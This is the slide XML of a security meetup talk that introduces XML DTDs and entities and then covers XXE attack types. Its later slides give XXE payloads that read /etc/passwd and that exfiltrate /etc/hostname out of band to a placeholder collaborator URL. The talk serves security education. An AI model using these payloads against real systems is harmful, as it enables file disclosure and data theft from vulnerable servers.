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82" r:id="rId4"/>
    <p:sldId id="268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3" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="303" r:id="rId16"/>
    <p:sldId id="310" r:id="rId17"/>
    <p:sldId id="296" r:id="rId18"/>
    <p:sldId id="297" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="299" r:id="rId21"/>
    <p:sldId id="300" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="304" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="308" r:id="rId26"/>
    <p:sldId id="309" r:id="rId27"/>
    <p:sldId id="306" r:id="rId28"/>
    <p:sldId id="314" r:id="rId29"/>
    <p:sldId id="312" r:id="rId30"/>
    <p:sldId id="311" r:id="rId31"/>
    <p:sldId id="307" r:id="rId32"/>
    <p:sldId id="313" r:id="rId33"/>
    <p:sldId id="298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DE72-45BF-4BF7-A509-16C684617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DC6FB-89F3-4387-8AA2-C3C1B5AFB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2F5CA-F32F-4621-8760-AF96A5E2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186-4762-4B4C-93A0-D246BB13C0F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6481-F759-4EF5-B581-3A9350B3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FAD4-B342-4CC6-9CCD-D15FDD67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BCD-C8E3-40D7-885F-54A035A9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7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04D2-597C-45C6-A167-4BC851DC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FC4B4-B886-49A8-B434-47440E006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1A79B-2E20-4D2F-B944-37DF0A93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186-4762-4B4C-93A0-D246BB13C0F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6A1C-E544-4B86-A8B6-3F2FCDFC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5E22-422C-47DF-895C-4FECF8D9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BCD-C8E3-40D7-885F-54A035A9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13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AA04C-3DA3-4398-BED3-21899B49F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07448-811E-4131-B59A-7DF35C76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9E82-BBA9-484C-AAF9-2E968677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186-4762-4B4C-93A0-D246BB13C0F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8565-D4E6-4D3D-AD5D-E8E7D36B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4DC64-7185-46AB-A853-18F28ABC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BCD-C8E3-40D7-885F-54A035A9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9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B1A4-6191-4503-AD82-F5EE6A34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4E07-5DE4-4744-B430-7EFE918DC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3B9A-11C9-4106-89D2-6E78D1E4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186-4762-4B4C-93A0-D246BB13C0F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79DF-1974-4AF3-B811-8E4BBBEC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18ED2-652D-4F13-8A73-709DCC41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BCD-C8E3-40D7-885F-54A035A9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1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B398-86AA-4A42-A39D-72DF9F9B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889E6-7DF7-43B2-87F1-031B36EEA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5805-4197-4C47-BCEF-B5D41741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186-4762-4B4C-93A0-D246BB13C0F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9A28A-F5FF-46BD-858D-B6F9B139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01D2-6E44-48D2-8DC0-C7BD54F3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BCD-C8E3-40D7-885F-54A035A9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46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A426-57A5-4F1F-A103-DAE66946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D680-3196-4E51-ADA7-64B3970BA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E560F-E31E-47FF-A982-3BFE6CF2B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9F1B0-976F-403A-824A-620D26BD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186-4762-4B4C-93A0-D246BB13C0F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176EA-F048-4947-9BB2-4FF29A91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59A0-B713-4765-B36A-764AA577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BCD-C8E3-40D7-885F-54A035A9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5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9392-6680-4171-BA90-6BBC4838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1A0B3-A77F-4FEC-86C2-475F0F27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A4662-0673-41BE-A92C-8FFA5A6F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B4CD0-3D9F-4F59-AE7D-5966C9FD6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CF141-AE81-4A13-B5A3-13558A9D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884C6-DBF5-4766-93A9-A81CE614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186-4762-4B4C-93A0-D246BB13C0F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39765-E5ED-4341-B647-4BDCCDEF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29501-A080-48C1-83EC-157D4353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BCD-C8E3-40D7-885F-54A035A9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3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3CC8-EB98-48A9-9DED-AF78914F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FE39E-1133-4784-BE02-3A5E32FC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186-4762-4B4C-93A0-D246BB13C0F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F9C01-1286-41F4-ABF0-EE5F9E08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B7BE1-A31A-4D42-BBA2-8C81D511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BCD-C8E3-40D7-885F-54A035A9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18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581A9-A62D-42DE-B328-1CF85D50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186-4762-4B4C-93A0-D246BB13C0F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68941-9484-4545-85F7-07DA87CB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22D4B-7165-4C1F-BDE9-A7D901A0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BCD-C8E3-40D7-885F-54A035A9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4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9F6A-C767-4C2E-A775-ED8D68F2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4CDE-00A0-4F94-8ED4-7937D4C0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13468-E9BA-4497-BAE6-4FEE8E3F4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B9808-0C49-4F84-929F-113B4954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186-4762-4B4C-93A0-D246BB13C0F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AA9-EC6F-4956-8CBC-BD68C8B8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6EFF2-EAFF-4FD4-BB72-06A18431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BCD-C8E3-40D7-885F-54A035A9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5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117E-3B66-4E50-99C9-0E03C311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BEC41-1DCA-4B47-8968-0F96C2570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AAE2-A65B-47AF-A0CC-F9A82DC08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F7661-88F2-4600-86AA-FA5AF523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6186-4762-4B4C-93A0-D246BB13C0F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8DFFE-F017-43F7-AC64-57C8C0C5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3237F-7328-4410-897F-0368F16B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7BCD-C8E3-40D7-885F-54A035A9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7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F29D0-9356-436E-910B-EEC45641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0C16-906A-4773-A82D-5BB32713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D1AE1-77EB-4E26-83CF-4BDC0EAA2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6186-4762-4B4C-93A0-D246BB13C0F5}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>14-03-2020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2975-A875-4AD9-B17B-BD1A4A79D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2B86-D386-41EB-96C5-CB1117ADE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7BCD-C8E3-40D7-885F-54A035A92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82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ack.com/blog/a-deep-dive-into-xxe-injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_whatis.as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" y="1569624"/>
            <a:ext cx="11423374" cy="1859376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2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;null&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)&lt;/null&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="8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7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599" cy="11323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Types of DTD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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496"/>
            <a:ext cx="10515600" cy="466725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There are two types of DTD :-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Internal DTD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External DTD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Internal DTD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If the DTD is declared inside the XML file, it must be wrapped inside the &lt;!DOCTYPE&gt; definition.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External DTD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If the DTD is declared in an external file, the &lt;!DOCTYPE&gt; definition must contain a reference to the DTD file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424598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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal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DTD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596F12-22A5-48DF-BB0D-4D02031E6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7" y="1364973"/>
            <a:ext cx="10542106" cy="5101397"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173443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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal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DTD 		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EEF8-A4F7-4CC1-8454-4BED41FF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7" y="1497496"/>
            <a:ext cx="10515600" cy="466725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!DOCTYPE NullMeet defines that the root element of this document is NullMeet.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!ELEMENT NullMeet defines that the NullMeet element must contain four elements: “FirstName, LastName, ContactNo, Email, City“.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!ELEMENT “FirstName, LastName, ContactNo, Email, City” defines the to element to be of type "#PCDATA“.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419298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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External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DTD 		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D21DF-D085-41B5-9F56-1254203BF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6" y="1253330"/>
            <a:ext cx="10515600" cy="54390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If the DTD is declared in an external file, the &lt;!DOCTYPE&gt; definition must contain a reference to the DTD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/>
                </a:solidFill>
              </a:rPr>
              <a:t> External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file :- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN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7ED406-BD06-4485-B9E4-44C95F424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4" y="2885077"/>
            <a:ext cx="10489092" cy="36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1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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External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DTD 		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D21DF-D085-41B5-9F56-1254203BF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6" y="1253330"/>
            <a:ext cx="10515600" cy="54390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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file contents :-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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4A05D8-C4FA-43F3-9970-EBE24B423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9" y="1973013"/>
            <a:ext cx="10373137" cy="42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6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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML DTD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entities		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D21DF-D085-41B5-9F56-1254203BF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6" y="1497496"/>
            <a:ext cx="10515600" cy="51550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 Entities are used to define shortcuts to special characters.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 Entities can be declared internal or external.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 Internal Entity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An internal entity is one that is defined locally within a DTD.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 Declaring the internal entity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 Entities must be declared before they can be used.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 All entities are declared with the "ENTITY" declaration.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207731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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML DTD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>built-in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entities		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D21DF-D085-41B5-9F56-1254203BF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6" y="1497496"/>
            <a:ext cx="10515600" cy="51550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 All XML parsers must support built-in entities.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There are five built-in entities that play their role in well-formed XML, they are: -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ampersand: &amp;amp;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Single quote: &amp;apos;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Greater than: &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt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Less than: &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lt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Double quote: &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot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2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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML DTD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entities		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D21DF-D085-41B5-9F56-1254203BF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6" y="1497496"/>
            <a:ext cx="10515600" cy="51550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 Internal entity example :-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bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity-value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal DTD Example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&lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nullmum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ankit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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]&gt;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The XML file :-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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nullmum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nullmum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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1324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599" cy="11323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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML DTD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entities		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D21DF-D085-41B5-9F56-1254203BF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6" y="1497496"/>
            <a:ext cx="10515600" cy="515509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 External entity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External entities, like internal entities, have names and are referenced in the same manner, although they are declared differently.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 External entity example :-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bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>entity-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URI/URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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// SYSTEM keyword and must specify a URL ( Protocols like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http, ftp, file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> are allowed).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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External DTD Example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The XML file :-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&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.w3schools.com/external.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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&lt;author&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/author&gt;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36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061" y="256498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Basics over, Let’s jump to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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		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5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DA0F1-8805-481A-8043-7BA7C09F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292548" cy="1066110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en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>nullmumbai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bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami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F6734-75E0-4B67-8938-F7B32CB1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1235"/>
            <a:ext cx="8387687" cy="3081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# Ankit Patel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# Associate Consultant (Aujas Cybersecurity)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# Application Security and Network Security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# Twitter Handle: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pwnnull</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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8EA38B5-10C9-467A-BB3E-6451BC379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736" y="460661"/>
            <a:ext cx="2464904" cy="30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9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599" cy="11323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Types of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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attacks 		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D21DF-D085-41B5-9F56-1254203BF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6" y="1497496"/>
            <a:ext cx="10515600" cy="5155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There are various types of XXE attacks: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Exploiting XXE to retrieve files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where an external entity is defined containing the contents of a file, returned in the application's response.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Exploiting XXE to perform SSRF attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where an external entity is defined based on a URL to a back-end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Exploiting blind XXE exfiltrate data out-of-band</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where sensitive data is transmitted from the application server to a system that the attacker controls.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Exploiting blind XXE to retrieve data via error messages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, where the attacker can trigger a parsing error message containing sensitive data.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0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Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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to retrieve files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68F65-2F0E-4E90-86AD-F01712306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Payload used:-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fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [ &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file:///etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR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XML file :-</a:t>
            </a:r>
          </a:p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&lt;productId&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;&lt;/productId&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR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92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2763769"/>
            <a:ext cx="10515599" cy="113237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DEMO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6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Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2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D48F573-ECFF-4847-9939-3E9353C8B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538" y="1868557"/>
            <a:ext cx="8600661" cy="38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89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2763769"/>
            <a:ext cx="10515599" cy="113237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DEMO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4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# Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entities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3BDB5-78A0-4389-B9BD-E410E11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7739"/>
            <a:ext cx="11247783" cy="47192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Parameter entities accomplish  the same task as the other entities do.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Parameter entities are used exclusively within DTDs.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Using parameter entities you can include element and attribute list declarations as groups and refer to them easily as single entities.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You can even include an entire DTD in a parameter entity.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Example :-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&lt;!ENTITY % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myParameterEntity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “Element" &gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544725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61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# Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Entities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3BDB5-78A0-4389-B9BD-E410E11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08" y="1616765"/>
            <a:ext cx="11247783" cy="45601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Example :-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&lt;!ENTITY %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>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "name, street, city, state, zipcode"&gt;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Later in the DTD, you can reference this parameter entity as follows :-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&lt;!ELEMENT invoice (%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>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;, item, price, date)&gt;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When this DTD is processed, it is as if you had specified the following :-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&lt;!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2847946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Exploiting blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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exfiltrate data out-of-band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352493-6EE8-44A9-9DBA-42A7FA4EF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87" y="1825625"/>
            <a:ext cx="9512226" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1948432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Exploiting blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE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exfiltrate data out-of-band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68F65-2F0E-4E90-86AD-F0171230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Payloads used :-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&lt;!ENTITY % file SYSTEM "file:///etc/hostname"&gt;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&lt;!ENTITY % eval "&lt;!ENTITY &amp;#x25; exfil SYSTEM 'http://collaborator_url/?x=%file;’&gt;”&gt;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%eval;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%exfil;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
